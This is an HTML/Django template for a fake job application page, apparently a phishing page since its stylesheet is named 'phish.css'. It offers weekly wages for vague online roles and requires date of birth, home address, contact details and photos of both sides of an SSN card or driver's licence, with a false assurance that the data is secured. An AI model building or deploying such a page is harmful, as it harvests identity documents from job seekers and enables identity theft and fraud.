<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="phish.css">
<style>
	.register{
    background: -webkit-linear-gradient(left, #3931af, #00c6ff);
    margin-top: 3%;
    padding: 3%;
}
.register-left{
    text-align: center;
    color: #fff;
    margin-top: 4%;
}
.register-left input{
    border: none;
    border-radius: 1.5rem;
    padding: 2%;
    width: 60%;
    background: #f8f9fa;
    font-weight: bold;
    color: #383d41;
    margin-top: 30%;
    margin-bottom: 3%;
    cursor: pointer;
}
.register-right{
    background: #f8f9fa;
    border-top-left-radius: 10% 50%;
    border-bottom-left-radius: 10% 50%;
}
.register-left img{
    margin-top: 15%;
    margin-bottom: 5%;
    width: 25%;
    -webkit-animation: mover 2s infinite  alternate;
    animation: mover 1s infinite  alternate;
}
@-webkit-keyframes mover {
    0% { transform: translateY(0); }
    100% { transform: translateY(-20px); }
}
@keyframes mover {
    0% { transform: translateY(0); }
    100% { transform: translateY(-20px); }
}
.register-left p{
    font-weight: lighter;
    padding: 12%;
    margin-top: -9%;
}
.register .register-form{
    padding: 10%;
    margin-top: 10%;
}
.btnRegister{
    float: right;
    margin-top: 10%;
    border: none;
    border-radius: 1.5rem;
    padding: 2%;
    background: #0062cc;
    color: #fff;
    font-weight: 600;
    width: 50%;
    cursor: pointer;
}
.register .nav-tabs{
    margin-top: 3%;
    border: none;
    background: #0062cc;
    border-radius: 1.5rem;
    width: 28%;
    float: right;
}
.register .nav-tabs .nav-link{
    padding: 2%;
    height: 34px;
    font-weight: 600;
    color: #fff;
    border-top-right-radius: 1.5rem;
    border-bottom-right-radius: 1.5rem;
}
.register .nav-tabs .nav-link:hover{
    border: none;
}
.register .nav-tabs .nav-link.active{
    width: 100px;
    color: #0062cc;
    border: 2px solid #0062cc;
    border-top-left-radius: 1.5rem;
    border-bottom-left-radius: 1.5rem;
}
.register-heading{
    text-align: center;
    margin-top: 8%;
    margin-bottom: -15%;
    color: #495057;
}
	</style>
	<body>
		<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container register">
                <div class="row">
                    <div class="col-md-3 register-left">
                        <img src="https://image.ibb.co/n7oTvU/logo_white.png" alt=""/>
                        <h3 style="color:red">All information are only required for background checking, user's  informations inputed are secured and won't be disclosed.</h3>
                        <h3>Employee Form</h3>
                        <p>Please Fill Carefully!</p>
                        <input type="submit" name="" value="Login" hidden/><br/>
                    </div>
                    <div class="col-md-9 register-right">
                        <ul class="nav nav-tabs nav-justified" id="myTab" role="tablist">
                            <li class="nav-item">
                                <a class="nav-link active" id="home-tab" data-toggle="tab" href="#home" role="tab" aria-controls="home" aria-selected="true">Employee</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="profile-tab" data-toggle="tab" href="#profile" role="tab" aria-controls="profile" aria-selected="false" hidden>Hirer</a>
                            </li>
                        </ul>
                        <div class="tab-content" id="myTabContent">
                            <div class="tab-pane fade show active" id="home" role="tabpanel" aria-labelledby="home-tab">
                                <h3 class="register-heading">Apply as a Employee</h3><br>
                                <br>
                                <br>
                                {% for i in messages %}
                                <h3 class="register-heading">{{i}}</h3>
                                {% endfor %}
                                <div class="row register-form">
                                	<form action=" " method="POST" enctype="multipart/form-data">
                                {% csrf_token %}
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <input type="text" class="form-control" placeholder="First Name *" value="" name="first_name" required />
                                        </div>
                                        <div class="form-group">
                                            <input type="text" class="form-control" placeholder="Last Name *" value="" name="last_name" required />
                                        </div>
                                        <div class="form-group">
                                            <input type="text" class="form-control" placeholder="Middle Name *" value="" name="middle_name" required />
                                        </div>
                                        <div class="form-group">
                                            <label>Date Of Birth </label>
                                        </div>
                                        <div class="form-group">
                                        	<label>Day </label>
                                            <input type="number" class="form-control" placeholder="5*" value="" name="birth_day" required />
                                        </div>
                                        <div class="form-group">
                                        	<label>Month </label>
                                            <input type="number" class="form-control" placeholder="10 *" value="" name="birth_month" required />
                                        </div>
                                        <div class="form-group">
                                        	<label>Year </label>
                                            <input type="number" class="form-control" placeholder="2000 *" value="" name="birth_year" required />
                                        </div>
                                        <div class="form-group">
                                            <select class="form-control" name="country" required>
                                                <option class="hidden"  selected disabled>Select Country</option>
                                                <option>USA</option>
                                                <option>CANADA</option>
                                              
                                            </select>
                                        </div>
                                        <div class="form-group">
                                            <input type="text" class="form-control"  placeholder="State*" value="" name="state" required/>
                                        </div>
                                        <div class="form-group">
                                            <input type="number" class="form-control"  placeholder="Zip Code*" value="" name="zip_code" required/>
                                        </div>
                                        <div class="form-group">
                                            <input type="text" class="form-control"  placeholder="Home Address*" value="" name="home_adress" required/>
                                        </div>
                                        <div class="form-group">
                                        	<label>SSN/DRIVER'S LICENCE FRONT PICTURE</label>
                                            <input type="file" class="form-control" name="ssn_driver_front" required>
                                        </div>
                                        <div class="form-group">
                                        	<label>SSN/DRIVER'S LICENCE BACK PICTURE</label>
                                            <input type="file" class="form-control" name="ssn_driver_back" required>
                                        </div>
                                      
                                        <div class="form-group">
                                            <div class="maxl">
                                                <label class="radio inline"> 
                                                    <input type="radio" name="gender" value="male" checked>
                                                    <span> Male </span> 
                                                </label>
                                                <label class="radio inline"> 
                                                    <input type="radio" name="gender" value="female">
                                                    <span>Female </span> 
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <input type="email" class="form-control" placeholder="Your Email *" value="" name="email"  required />
                                        </div>
                                        <div class="form-group">
                                            <input type="text" name="phone_number" class="form-control" placeholder="Your Phone *" value="" name="phone_number"  required />
                                        </div>
                                        <div class="form-group">
                                            <select class="form-control" name="occupation" required>
                                                <option class="hidden"  selected disabled>Select one from the Available Jobs</option>
                                                <option>Online Marketer <b style="color:green">$200-$250 weekly wages</b></option>
                                                <option>Online Distributor  <b style="color:green">$200-$250 weekly wages</b></option>
                                                <option>Customer Support <b style="color:green">$400-$450 weekly wages</b></option>
                                            </select>
                                        </div>
                                        <div class="form-group">
                                            <textarea type="text" class="form-control" placeholder="Reason for applying for the choosen job..." value="" name="occupation_reason" required></textarea>
                                        </div>
                                        <input type="submit" class="btnRegister"  value="Apply"/>
                                    </div>
                                </div>
                            </div>
                            </form>

            </div>
		
</body>
</html>